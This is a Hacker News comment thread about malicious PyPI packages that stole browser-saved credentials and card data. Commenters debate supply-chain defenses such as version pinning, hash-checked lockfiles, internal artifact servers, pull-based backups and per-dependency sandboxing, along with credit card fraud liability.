| is locked, and fail if the hashes don't match.
|
| in python pipenv works the same way, pipenv sync will only
| install what is locked, and will check your hashes. I'm not
| sure about poetry.
| rtpg wrote:
| I mean you can have reproducible builds while being on the
| upgrade train. `package-lock.json` eixsts for a reason. And
| the tiny pains of upgrading packages over time mean that then
| you don't have to deal with gargantuan leaps when that one
| package has the thing you want and it requires updating 10
| other packages because of dependencies.
|
| Node is a special horror because of absolute garbage like
| babel splitting itself into 100s of plugins and slowly
| killing the earth through useless HTTP requests instead of
| just packaging a single thing (also Jon Schlinkert wanting to
| up his package download counts by making a billion useless
| micropackages). But hey, you're choosing to use those
| packages.
|
| I think if you're using them, good to stay up to date. But
| you can always roll your own thing or just stay pinned. Just
| that stuff is still evolving in the JS world (since people
| still aren't super satisfied with the tooling). But more
| mature stuff is probably fine to stick to forever.
| Nursie wrote:
| > keeping packages up to date.
|
| It's good security practice, especially for anything internet
| facing.
|
| Sure, you don't have to do it obsessively, but if you let it
| stagnate you can have trouble updating things when critical
| vulnerabilities are found, and you have a huge job because
| multiple APIs have changed along the way.
| pjmlp wrote:
| I have been doing internal repositories and vendoring since
| 2000, only for personal projects do I do otherwise as they are
| mostly throw away stuff.
|
| Teaching good security practices and application lifecycle
| management seems to always be an uphill battle.
| yjftsjthsd-h wrote:
| Sorry, I don't quite see how this would protect against supply
| chain attacks. If an upstream dependency is back-doored, they
| just have to silently add their code in an otherwise reasonable
| sounding release, and now you will happily download that
| version, add it to your internal mirrors, and pin its version
| forever. Unless you actually read the diff on every update,
| which I think is impractical (although you're welcome to
| correct me), I don't see how this is buying you much.
| ozzythecat wrote:
| It's not 100% bullet proof, but it's safer than pulling any
| random repos directly from the internet.
|
| It's also good that your business doesn't have to rely on a
| third party every time you need to pull down your
| dependencies and build your software.
| DSingularity wrote:
| Protects you against a dependency being hijacked and
| retroactively embedding malware in prior versions . Check
| summing would protect against that without the trouble of
| manually hosting the dependency.
| polynomial wrote:
| My read was GP is implying they _do_ read the diff every
| time, and only change the pinned version after a manual
| review- "only after we are happy."
|
| This does seem impractical at even a modest scale.
| yardstick wrote:
| We periodically review all dependencies change logs,
| security advisories etc and update based on risk review. We
| also keep an eye out for critical vulnerabilities that need
| immediate patching. There are tools to help with this, plus
| communities like HN are relevant for breaking news.
| zerkten wrote:
| What does "modest scale" mean? Some people have to have all
| dependency updates reviewed and have some level of
| independent security team monitoring dependency changes.
| Not everyone has this, but the context is key as some
| domains have this consistently.
|
| Some of this is cultural in addition to being paranoid
| about security, or having strict compliance requirements.
| For your average startup, they may not have any time to
| dedicate to this and other fires, but that's not a
| universal situation.
| staticassertion wrote:
| > What does "modest scale" mean? Some people have to have
| all dependency updates reviewed and have some level of
| independent security team monitoring dependency changes.
|
| Who? Seems totally intractable to me.
| cortesoft wrote:
| I think part of the idea is that if you only use versions
| that have been released for a little while, you are hoping
| SOMEONE notices the malicious code before you finally update.
|
| There are a number of issues with this approach, although the
| practice still might be a net benefit.
|
| One, you are going to be behind on security patches. You have
| to figure out, are you more at risk from running unpatched
| code for longer, or from someone compromising an upstream
| package?
|
| Two, if too many people use this approach, there won't be
| anyone who is actually looking at the code. Everyone assumes
| someone else would have looked, so no one looks.
| helsinki wrote:
| FYI - You can overwrite an existing package's release/version
| via pip (at least when using Artifactory's PyPi). Not safe to
| assume pinning the version 'freezes' anything.
| nerdponx wrote:
| Make a "lockfile" with the pip-compile tool [0] that includes
| hashes. Unless you happen to fetch the hash after the package
| has been compromised, this should keep you safe from an
| overwritten version.
|
| [0]: https://pypi.org/project/pip-tools/
| oefrha wrote:
| No, you cannot overwrite a file on PyPI once uploaded, even
| if you delete the release first. This policy has been in
| place for many years.
| globular-toast wrote:
| Pip also supports packages hashes so you can be sure you're
| getting the exact same package that you got last time.
| [deleted]
| Nursie wrote:
| This is how it always used to be, back in the before[1] times.
| Libraries would be selected carefully and dependencies would be
| kept locally so that you could always reproduce a build.
|
| The world is different now, and just being able to select a
| package and integrate it like _that_ is a massive effectiveness
| multiplier, but I think the industry at large lost something in
| the transition.
|
| ([1] before internet package management, and before even stuff
| like apt and yum)
| goodpoint wrote:
| > I think the industry at large lost something in the
| transition.
|
| Lost a lot of trust and security with the advent of language-
| specific installers that pull libraries and their
| dependencies from random URLs without any 3rd party vetting.
| mikepurvis wrote:
| I agree, though I think there are a couple pieces to the
| puzzle. Like, quite apart from the enormous convenience of
| new releases being available right away, and even being
| able to drop in a git URL and run your dependency off a
| branch while you wait for your upstream PR to merge, pip
| provides isolation between workspaces that apt has never
| been able to do natively because it's too generic-- the
| closest thing is lightweight unshares, but those were years
| after virtualenv, require more ceremony to get going with,
| and may be isolated from the outside system in ways that
| impede productivity (there's also never _really_ been a
| consistent tooling story for it, with having to cobble
| together debootstrap + whatever the chroot flavor of the
| week is).
|
| But the biggest issue is when npm, cargo, etc showed how to
| include a dependency multiple times at different versions.
| Operating system package managers (other than Nix &
| friends) have no concept for how this could or would work.
| Pip has no story for it, and the various pip-to-apt bridges
| like py2deb and stdeb if anything just exacerbate the
| problem, by mixing your project's dependencies with those
| on your system.
|
| Anyway, yes. Things were lost, 100%. But I don't think the
| system you want (isolation, version freedom, but with
| safe/vetted packages) is going to be something that's
| possible to evolve out of any of the current systems. It's
| got to be something that goes back to first principles.
| goodpoint wrote:
| > pip provides isolation between workspaces that apt has
| never been able to do natively because it's too generic
|
| This is hardly a concern on production systems. It's been
| common practice for decades to deploy each service on a
| dedicated host, or at least a VM in order to have a
| degree of security isolation. [or a container if you
| don't care]
|
| > npm, cargo, etc showed how to include a dependency
| multiple times at different versions
|
| And this is why they cannot provide stable releases and
| security backports.
|
| If you want security updates you can use Debian or pay $$
| for SuSE or Red Hat or $$$$ for custom support from some
| tech companies, but they will mostly support one version
| per package.
|
| The combinatorics explosion of packages _times_ versions
| on archives like npm or pypi makes it prohibitively
| expensive to reliably patch and test every combination of
| packages and versions.
|
| Debian has been pioneering reproducible builds and
| automated installation CI/QA and it still took a lot of
| effort to get there.
|
| > I don't think the system you want (isolation, version
| freedom, but with safe/vetted packages) is going to be
| something that's possible to evolve out of any of the
| current systems.
|
| I don't want version freedom: it's not attainable. It's
| not a software problem, it's a math problem.
|
| > It's got to be something that goes back to first
| principles.
|
| Any idea?
| mikepurvis wrote:
| If you don't want or need version freedom, what is it
| about the existing deb/rpm ecosystems that don't work for
| you, either on their own or in conjunction with the
| various tools that bridge other ecosystems into them?
| (I'm a fan of dh_virtualenv, myself)
|
| Or is your lament that the world as a whole is worse off
| because others have eaten of the fruit of systems like
| npm and pip?
| goodpoint wrote:
| The latter, albeit it's not "the world as a whole", but
| some tech bubble. Various large companies prohibit
| pip/npm/docker.
|
| (and here I'm even getting downvoted for going against
| the hivemind)
|
| I can only hope that after enough software supply chain
| attacks the industry will realize that distros were right
| all along.
| _tom_ wrote:
| The problem is that it also is a vulnerability multiplier.
|
| People used to understand every package the installed. Now,
| they install dependencies of dependencies of dependencies, to
| the point that they have not even SEEN the name of most of
| their dependencies.
|
| Install anything with maven and count the number of packages
| installed. It is appalling.
| pornel wrote:
| Own hosting, pinning, and checksum checks are defenses against
| network-based attacks and compromise of the package repository.
|
| They do nothing against trojans like these. You will be running
| your own pinned checksummed version of the malicious code.
|
| If you want to stop malware published by the legitimate package
| author, you need to review the code you're pulling in and/or
| tightly sandbox it (and effective sandboxing is usually
| impossible for dependencies running in your own process).
| actually_a_dog wrote:
| Depending what you mean by "review," then I agree with you.
|
| If you mean having humans inspect every line of code of every
| package, well... good luck with that. But, if you're talking
| about automated analysis and acceptance testing, then, I
| think you've got something.
|
| Like unit testing, automated testing and analysis is never
| going to catch 100% of all issues, but it can definitely help
| your SRE team sleep at night.
| dec0dedab0de wrote:
| it does stop against type-o'd dependencies. So if there was
| an evil package called requestss then you wouldn't be able to
| install it by accident.
| tremon wrote:
| Well, it does induce a timed delay between upstream release
| of a compromised package and when it enters the own codebase.
| As long as the exploit is found and published before someone
| manually uploads it to the local store, you're safe.
|
| But yes, a better option would be to run your own acceptance
| tests on each new upstream release, and that includes
| profiling disk/network/cpu usage across different releases.
| jameshart wrote:
| Also introduces that same time delay for getting security
| patches released by package maintainers into your build
| pipeline.
| tracker1 wrote:
| This... worked in an org, where it literally took nearly
| 3 months to get package updates and additions approved...
| and that was for licensing review, not even proper
| security audits.
|
| It may be safer to just accept that you live in the wild
| west and have systems boundaries in place to limit
| exposure/impact.
|
| I've been pushing for closed-box logging targets, for
| example, where all logging goes to at _least_ two systems
| (local and remote) so that the logging target is
| generally only available to submit log lines entries to.
| Not perfect, but where my head has been at.
|
| Another thing is to _PULL_ backups, not push them out.
| jacquesm wrote:
| > Another thing is to PULL backups, not push them out.
|
| That's an absolute must. A push backup may not be a
| backup at all when you need it, or it may be compromised.
| It also requires the system you push into to be
| accessible for inbound connections, which in itself may
| be problematic.
| beefjerkins wrote:
| I'm trying to wrap my head around the concept of
| 'pulling' backups, rather than pushing them. In my mind,
| once you make a backup, you should then transfer it to a
| separate system for archival.
|
| Where am I going wrong?
| jjnoakes wrote:
| To pull backups, the backup system connects to the
| production system and grabs the data, storing it locally
| on the backup system. To push backups would be for the
| production system to connect to the backup system and
| send the data.
|
| The main benefit of pull-based backups is that the
| production machine doesn't need credentials to write to
| the backup server; this means if production is
| compromised, it can't corrupt your backups.
| yardstick wrote:
| Not true. We assess each update in case of high priority
| issues that need a quick update.
|
| Also we are cautious of using dependencies that don't
| provide long term support/back fixes - where possible I
| pick stable, responsibly-managed dependencies. Postgres
| is a great example, security fixes are applied across
| multiple major versions, not just the latest.
| rexelhoff wrote:
| Sounds exactly like what we do for medical device
| software.
|
| Version pinning, self-managed forks and code reviews of
| the dependency on upgrade.
| geofft wrote:
| How do you get informed about whether a high-priority
| issue exists?
|
| In particular, who is auditing the old version of the
| code that you happen to be running to make sure it
| doesn't have vulnerabilities that are now gone after a
| non-security-motivated change like a refactoring or a
| feature removal? Probably not the upstream maintainers,
| who generally only maintain HEAD.
| neves wrote:
| And you should run an antivirus in the repository machine.
| It will be really slow, but will eventually catch these
| malicious libs.
| stjohnswarts wrote:
| You will never eliminate the threat entirely, pinning and not
| using obscure projects does however cut down on the
| probability and you can't deny that.
| ericpauley wrote:
| Out of curiosity, is it really necessary to have the separate
| artifact server? Pinning dependencies by hash ought to be
| sufficient.
| fortran77 wrote:
| It's nice to have a build machine that can complete a build
| when it's disconnected from the Internet
| kawsper wrote:
| How often does that happen?
| ex_amazon_sde wrote:
| It's standard practice in many large companies.
| 83457 wrote:
| Sometimes I use an air gapped test lab. Setup of certain
| software and projects is a real pain. Sounds like this
| approach could help.
| oauea wrote:
| https://hn.algolia.com/?q=cloudflare+down
|
| https://hn.algolia.com/?q=akamari+down
|
| https://hn.algolia.com/?q=github+down
| jrockway wrote:
| Docker Hub also has rate limits and outages, so yet
| another thing you want to cache if you promise customers
| "we'll install our software in your Kubernetes cluster in
| 15 minutes 99.95% of the time".
| jrockway wrote:
| Security and availability don't have to be mutually
| exclusive. I remember in the early day of Go modules our
| Docker builds (that did "go mod download") would be rate-
| limited by Github, so a local cache was necessary to get
| builds to succeed 100% of the time. (Yes, you can plumb
| through some authentication material to avoid this, but
| Github is slow even when they're not rate limiting you!)
| Honestly, that thing was faster than the official Go Module
| Proxy so I kept it around longer than necessary and the
| results were good.
|
| Even if you cache modules on your own infrastructure, you
| should still validate the checksums to prevent insiders from
| tampering with the cached modules.
|
| I'll also mention that any speed increases really depend on
| your CI provider. I self-hosted Jenkins on a Rather Large AWS
| machine, and had the proxy nearby, so it was fast. But if you
| use a CI provider, they tend to be severely network-limited
| at the node level and so even if you have a cache nearby, you
| are still going to download at dialup speeds. (I use CircleCI
| now and at one point cached our node_modules. It was as slow
| as just getting them from NPM. And like, really slow... often
| 2 minutes to download, whereas on my consumer Internet
| connection it's on the order of 10 seconds. Shared
| resources... always a disaster.)
| helsinki wrote:
| Tangential non-sequitor:
|
| > self-hosted on AWS
|
| People forgot what self-hosting actually means.
| jrockway wrote:
| I disagree with that analysis. That basically means
| running some binary yourself, with the alternative being
| buying a SaaS product that is hosted by the developer.
| You may think that "self-hosting" means having your own
| physical server, but I have never heard anyone else use
| the expression like that.
| paulryanrogers wrote:
| Meanings can evolve over time. I tend to think of self
| hosted as installing from code and managing myself,
| whether on local hardware or remote.
| jijji wrote:
| The OP wrote "self-hosted Jenkins", which has a different
| meaning
| yardstick wrote:
| Seems reasonable enough depending on your use case.
|
| In our situation we store our own (private, commercial)
| artifacts as well as third party ones, so we already need to
| have a server, and we know our server is configured,
| maintained & monitored in a secure fashion whereas I have no
| guarantees with public servers.
|
| Plus our build servers don't have access out to the internet
| either, for security. Supply chain attacks like SolarWinds
| and Kaseya are too common these days.
|
| Edit: Also, our local servers are faster at serving requests,
| allowing for faster builds, and ensures no issues with broken
| builds if a public repo went offline or was under attack.
| tikkabhuna wrote:
| We use an artifact server and our build servers are
| completely airgapped. We know exactly what dependencies are
| used across the organisation. We can take centralised action
| against malicious dependencies.
|
| I wouldn't bother having one if you're small (<25) people. If
| you start having a centralised Infosec group, then it starts
| to become necessary.
| njharman wrote:
| Airgaped? Really? Everytime a build happens someone
| physically moves a Thu drive or some other media too from
| the build server?
|
| Airgap means not networked, even internally. Not just
| "blocked" from internet.
| tikkabhuna wrote:
| Wikipedia[1] offers a slightly relaxed definition,
| although I agree, I (and my colleagues) abuse the term.
|
| The artifact repository server connects to the internet
| via a proxy. Build servers have no access to the
| internet.
|
| [1] https://en.wikipedia.org/wiki/Air_gap_(networking)
| zerkten wrote:
| It's going to depend on your circumstances. You don't share
| any context about your app or any of your development. Rather
| than looking at this from the perspective of needing an
| artifact server, you just look at it as a case of supply
| chain protection.
|
| If pinning dependencies counters all the threats in your
| threat model, then fine. If not, you need to be doing
| something to counter them. An artifact server, or vendoring
| your dependencies, provides provides a lot of additional
| control where chokepoints or additional audits can be
| inserted.
|
| If there was no management cost or hassle then you'd just
| have an artifact server to give you a free abstraction, but
| it's a trade-off for many people. It's also not a solution in
| itself, you need to be able to do audits and use the artifact
| server to your advantage.
|
| The problem is really with the threat models and whether
| someone really knows what they need to defend against. I find
| that many engineers are naive to the threats since they've
| never personally had exposure to an environment where these
| are made visible and countered. At other times, engineers are
| aware, but it's a problem of influencing management.
| formerly_proven wrote:
| Depending on what you're using for package management, an
| "artifact server" can be as simple as a directory in git or a
| dumb HTTP server. File names are non-colliding and you don't
| really need an audit log on that server, because all
| references are through lock-files in git with hashes (right?
| RIGHT?), so it basically doesn't matter what's on there.
| actually_a_dog wrote:
| Yep. You should also be hosting and deploying from wheels[0],
| even for stuff you create internally. If you're doing it right,
| you'll end up hosting your own internal PyPi server[1], which,
| luckily, isn't hard[2].
|
| We did this at one of my previous companies, and, of all the
| things that ever went wrong with our deploy processes, our
| internal PyPi server was literally _never_ the culprit.
|
| ---
|
| [0]: https://pythonwheels.com/
|
| [1]: https://github.com/testdrivenio/private-pypi
|
| [2]: https://testdriven.io/blog/private-pypi/
| grincho wrote:
| Yes, this is why I implemented hash-checking in pip
| (https://pip.pypa.io/en/stable/topics/repeatable-
| installs/#ha...). Running your own server is certainly another
| way to solve the problem (and lets you work offline), but
| keeping the pinning info in version control gives you a built-
| in audit trail, code reviews, and one fewer server to maintain.
| stavros wrote:
| Doesn't Poetry do this by default in its lockfile too?
| c618b9b695c4 wrote:
| There is an active PEP[0] for defining lockfiles.
|
| 0: https://www.python.org/dev/peps/pep-0665/
| ageofwant wrote:
| You should mention this in your interviews. Keeping up to date
| with the state of the art is implicit for me. If I need to
| spend months retraining or up training because of company
| policy I expect to be compensated for that while employed.
| yardstick wrote:
| We are upfront about it in interviews. We definitely don't
| want unhappy developers, but we also don't want insecure
| code. We do upgrade libraries but we do so only after
| analysing risk and impact. None of our developers have spent
| months training to develop our code.
| HALtheWise wrote:
| It seems to me like one low hanging fruit to make a lot of these
| kinds of exploits significantly more difficult is protection at a
| language level about which libraries are allowed to make outgoing
| HTTP requests or access the file system. It would be great if I
| could mark in my requirements.txt that a specific dependency
| should not be allowed to access the file system or network, and
| have that transitively apply to everything it calls or eval()'s.
| Of course, it would still be possible to make malware that
| exfiltrates data through other channels, but it would be a lot
| harder.
|
| I am not aware of any languages or ecosystems that do this, so
| maybe there's some reason this won't work that I'm not thinking
| of.
| delosrogers wrote:
| If I'm not mistaken I think that some languages with managed
| effects allow you to do this through types. For example, in Elm
| HTTP requests have the type of Cmd Msg and the only way to
| actually have the IO get executed is to pass that Cmd Msg to
| the runtime through the update function. This means you can
| easily get visibility, enforced by the type system, into what
| your dependencies do and restrict dependencies from making http
| requests or doing other effects.
| dhosek wrote:
| I've been thinking about this a lot as I consider the scripting
| language for finl.1 I had considered an embedded python, but
| ended up deciding it was too much of a security risk, since,
| without writing my own python interpreter (something I don't
| want to do), sandboxing seems to be impossible. Deno is a real
| possibility or else forking Boa which is a pure Rust
| implementation of JS.
|
| 1. One thing I absolutely do _not_ want to do is replicate the
| unholy mess that 's the TeX macro system. There will be simple
| macro definitions possible, but I don't plan on making them
| Turing complete or having the complex expansion rules of TeX.
| landonxjames wrote:
| Deno (a Node-like runtime by the original author of Node) has a
| security model kind of like this [0]. Its unfortunately not as
| granular as I think it should be (only operates on the module
| level and not individual dependencies), but its a start.
|
| [0] https://deno.land/manual/getting_started/permissions
| bredren wrote:
| Ryan Dahl, (above mentioned creator of Deno), gave his second
| podcast interview ever this spring, it went live June 8th.
| [1]
|
| It covers a lot of terrain including the connectivity
| permissions control.
|
| I recommend it as an easy way to learn about Deno and how it
| is different from Node as it is today.
|
| Node seems to have evolved to handle some of what Deno set
| out to do at the start. It is worth hearing from Dahl why
| Deno is still relevant and for what use cases.
|
| Dahl speaks without ego and addresses interesting topics like
| the company built around Deno and monetization plans.
|
| [1] https://changelog.com/podcast/443
| hortense wrote:
| This can be done with capability-based operating system, though
| it requires running the libraries you want to isolate in a
| separate process.
|
| On a capability-based OS you whitelist the things a given
| process can do. For instance, you can give a process the
| capability to read a given directory and write to a different
| directory, or give the capability to send http traffic to a
| specific URL. If you don't explicitly give those capabilities,
| the process can't do anything.
| parhamn wrote:
| I was wondering earlier how useful deno's all-or-nothing
| policies would actually be in the real world. It seems like
| rules like this (no dep network requests, intranet only, only
| these ips) are much more useful than "never talk to the web".
|
| For python this probably wont ever be possible given the way
| the import system works and the patching packages can do.
| tadfisher wrote:
| Portmod[0] is a package manager for game modifications
| (currently Morrowind and Doom), and it runs sandboxed Python
| scripts to install individual packages. So I think this is
| possible, but it's not a built-in feature of the runtime as
| is the case for deno.
|
| [0]: https://gitlab.com/portmod/portmod
| helsinki wrote:
| This is a great idea, but I'm not sure how it could be
| implemented without cgroups, which are a pain, especially when
| you don't have root access.
| cesarb wrote:
| What you want sounds like the way Java sandboxing worked
| (commonly seen with Java applets). The privileged classes which
| do the lower-level operations (outgoing network requests,
| filesystem access, and so on) ask the Java security code to
| check whether the calling code has permission to do these
| operations, and that Java security code throws an exception
| when they're not allowed.
| geofft wrote:
| Yes, and also, this is an extraordinarily complex design to
| implement and get right. Java more or less failed in contexts
| where it was expected to actually enforce those boundaries
| reliably - untrusted applets on the web. It's working great
| in cases where the entire Java runtime and all libraries are
| at the same trust level and sandboxing/access control
| measures, if any, are applied outside the whole process - web
| servers, unsandboxed desktop applications like Bazel or
| Minecraft, Android applications, etc. Security
| vulnerabilities in Java-for-running-untrusted-applets
| happened all the time; security vulnerabilities that require
| you to update the JRE on your backend web servers are much
| rarer.
|
| If you make a security boundary, people are going to rely on
| it / trust it, and if people rely on it, attackers are going
| to attack it for real. Making attacks _harder_ isn 't enough;
| some attacker will just figure it out, because there's an
| incentive for them to do so. It is often safer in practice
| not to set up the boundary at all so that people don't rely
| on it.
| staticassertion wrote:
| I started building this at one point. Basically there's an
| accompanying manifest.toml that specifies permissions for the
| packages with their checksums, and then it can traverse the
| dependency graph finding each manifest.toml.
|
| It also generated a manifest.lock so if manifests changed you
| would know about it.
|
| Then once it built up the sandbox it would execute the build.
| If no dependencies require networking, for example, it gets no
| networking, etc.
|
| I stopped working on it because I didn't have time, and it
| obviously relied on everyone doing the work of writing a
| manifest.toml and using my tool, plus it only supported rust
| and crates.io
|
| TBH it seems really easy to solve this problem, it's very well
| worn territory - Browser extensions have been doing the same
| thing for decades. Similarly, why can I upload a package with a
| near-0 string distance to another package? That'd help a
| massive amount against typosquatting.
|
| No one wants to implement it who also implements package
| managers I guess.
| peanut_worm wrote:
| I am surprised this doesn't happen to NPM all the time
| otagekki wrote:
| It does: https://www.zdnet.com/google-amp/article/malicious-
| npm-packa...
| toxik wrote:
| How do you know it doesn't?
| LambdaTrain wrote:
| On Windows 10 if I want to view plaintext of stored password in
| chrome, the password of the currently logged in Windows user will
| be required. So is password stored and encrypted? Just wondering
| if the same is done to cc information and if such practice is
| effective against malware stealing
| soheil wrote:
| Can trusted PyPI packages or other language packages be taken
| over? Can their author once benevolent become malicious and
| inject code and push a minor version after they wake up one day?
| mm983 wrote:
| there once was an adblocker called nano which was open source
| and quite popular. the developer sold the ownership and the new
| owners injected malware which was then shipped to all chrome
| users with the extension.
|
| so i don't see why the same shouldn't work for pypi packages
| and i also don't understand why noone saw this coming. with how
| many companies have adopted python there surely will be a
| security vendor willing to provide free package screening for
| the repo
| ageofwant wrote:
| Interesting that all the noted examples assume a Windows host. I
| like that, people that use Windows deserve the drama the get ;-)
| outworlder wrote:
| Sometimes they don't get a choice. Specially in a corporate
| environment.
| speedgoose wrote:
| I'm using Github Codespaces since a few months and I'm wondering
| whether developing in such a remote sandbox is an improvement for
| security. I feel like it would prevent a python or npm package to
| steal my cookies and credit card numbers.
| AtlasBarfed wrote:
| Oh look, an advertisement.
|
| Also, thank you for causing mass disruption in javaland by
| shutting down your repos on pretty short notice.
|
| Artifactory may be a good piece of software with a good purpose,
| least of which is the public repository security problem, but
| every company I have been has used it with a hammer to stifle use
| of open source and create a "lords of data" style fiefdom in the
| company with tons of procedures.
| legrande wrote:
| > The second payload of the noblesse family is an "Autocomplete"
| information stealer. All modern browsers support saving passwords
| and credit card information for the user:
|
| > Browser support for saving passwords and credit card
| information
|
| > This is very convenient, but the downside is that this
| information can be leaked by malicious software that got access
| to the local machine.
|
| I never store CC deets anywhere, not even in a secure password
| manager vault. I typically manually type it out from the card, as
| I rarely use a CC (Every month or so I use it). I can see why
| automatically filling in CC info would be useful for people who
| use their CC _a lot_.
|
| If I was using it a lot, I would use a non-browser password
| manager however, since browser secrets can be exfil'd via various
| means and I trust a non-browser password manager vault more.
| DannyBee wrote:
| In the US, CC has, by law, almost no liability for fraud - it's
| capped at 50 bucks, and is 0 bucks if you report it before it
| gets used. They are also easily replaced, so i think many
| wouldn't go as far as you are.
|
| Debit cards are weirder in their liability (and are extracting
| money from your bank account, which is harder to get back).
|
| If you report them lost/stolen before someone uses them, it's 0
| bucks Within 2 days of learning about it, it's 50 bucks. More
| than 2 days, but less than 60, 500 bucks. More than 60 days -
| unlimited liability.
|
| So i'd be a lot more careful with debit cards, at least in the
| US.
|
| (You are never liable on either for unauthorized transactions
| when your card is _not_ lost /stolen as long as you report them
| within 60 days)
| r3trohack3r wrote:
| Hmm. I understood this to be different, but realizing now I
| don't have sources for where I learned this:
|
| * Bank accounts, savings accounts, brokerage accounts, etc.
| are all unlimited liability
|
| * Lines of credit are all zero liability
|
| I've used this as a rule of thumb for many years, and was the
| initial reason for me switching to 100% credit cards for
| transactions.
| DannyBee wrote:
| Yeah, i'm telling you based on what the statutes say (the
| FCBA covers credit cards, the EFTA covers debit)
|
| A short version of it is here:
| https://www.consumer.ftc.gov/articles/0213-lost-or-stolen-
| cr...
| brianwawok wrote:
| I would never ever use a debit card outside of the ATM of the
| bank I belong to.
|
| Credit card? Go wild, use it everywhere.
| dhosek wrote:
| What I like about the Mac implementation of storing credit
| cards is that it requires using touch ID to autofill the credit
| card info. There's no autofill without explicit user
| interaction.
| jetrink wrote:
| Credit cards are insecure by design and worrying about having
| them stolen from your browser or vault is not worth it in my
| opinion. You're far more likely to have it compromised from the
| retailer side no matter how careful you are. Also, it's easy to
| set up a notification on your phone for every time a card is
| used, so you can report fraud before any harm is done.
| prower wrote:
| Some online banks (don't know how widespread this is) allow
| you to create "virtual card" that expire either after 1
| purchase or at a specific date (and with a set maximum of
| budget). I use them for every single purchase I make online,
| it's inconvenient but at least i've never entered my real
| card info anywhere.
| brianwawok wrote:
| That sounds like a lot of work. At least in the US you are
| not responsible for fraud. (I think the law may have like a
| $50 liability thing, but Visa/MC waive). So it's better to
| just not do this, and every 3-4 years when my CC is stolen,
| call them up - dispute the charges, get a new number. Takes
| < 5 minutes and I keep going.
|
| For what it's worth, the 2 times my number got stolen in
| the last 6 years, one was from a rogue agent at a hotel in
| Chicago, and one was from a bad website that stored credit
| cards.
| trepatudo wrote:
| In Portugal, you basically open the app, scan fingerprint
| to give permission and get a new card.
|
| You can even scan the card via webcam or copy the details
| to clipboard.
|
| The virtual card also limits itself either to single
| transaction or single store so it can't be used even if
| compromised on store level.
|
| It's pretty simple process (<30sec) and it's really
| useful.
| hggythhdtr wrote:
| > That sounds like a lot of work.
|
| My bank has a browser plugin that can create virtual
| cards with just a few clicks.
|
| > dispute the charges, get a new number. Takes < 5
| minutes and I keep going.
|
| This isn't the case for me, it would take me quite a bit
| of time over a period of several weeks to update all of
| the places i use my card if I were using the same number
| everywhere and it was compromised. I handle a lot of
| billing. I've had cards compromised at least three times
| in the past and it's very unpleasant. (for me)
| nIHOPp6MQw0f5ut wrote:
| Privacy (dot) com offers that as a service and you can use
| their extension to generate a card without leaving the
| page.
| bastardoperator wrote:
| Exactly this. I just assume my credit card will be stolen or
| leaked. Nearly every credit card has zero liability
| protection too so there is no use in worrying, this is why I
| use credit cards.
| TheFreim wrote:
| Liability and protection provided by credit cards is one of
| the reasons some people suggest using them and never using
| a debit card. Easier to get money back if it gets stolen
| from a credit card (assuming some YouTube video I saw was
| accurate).
| kristianp wrote:
| I definitely want to avoid having my credit card details
| stolen. The inconvenience of calling the bank to report
| fraudulent transactions and then waiting a few weeks for a
| replacement card to arrive is something to avoid if you value
| your time.
|
| I save most passwords in the browser, including discord, but
| not important things like banks and emails. Password manager
| for that. I think it's foolish of Chrome to offer to save CC
| details.
| njharman wrote:
| I use CC for everything. Shop tons online, multiple sites .
| Store my CC on browser and share that across desktop, laptop,
| ipad and phones.
|
| In last 10 years I've had one incident were CC company did not
| automatically deny fraud. Two purchases both refunded to me.
| williamdclt wrote:
| I've been thinking I should probably just memorising my card
| number. Would take a bit of effort but can't be much harder
| than memorising a phone number, and possibly faster than
| entering my master password to unlock my password manager
| the_only_law wrote:
| I've done it a number of times without even trying. Problem
| is if you have to replace it a lot.
| dbrgn wrote:
| I've memorized my last 2 credit card numbers. Takes about
| 5-10 minutes and is absolutely worth it!
| null_deref wrote:
| Oh at last, I can feel slightly less ashamed of being part of the
| Israeli technology scene.
| fortran77 wrote:
| kl yshrl `rbym zh lzh
| null_deref wrote:
| I fully believe in this statement, and let me assure you I'm
| proud to be Israeli. But, when NSO articles pop like
| mushrooms after rain, I'm feel sad for a period of time (a
| feeling I also encounter when I read about Israeli internet
| gambling companies).
| goodpoint wrote:
| This is why I use packages from a Linux distribution -
| specifically Debian.
| snapetom wrote:
| I've never heard of these libraries. Anyone know what they did?
___________________________________________________________________
(page generated 2021-08-03 23:00 UTC)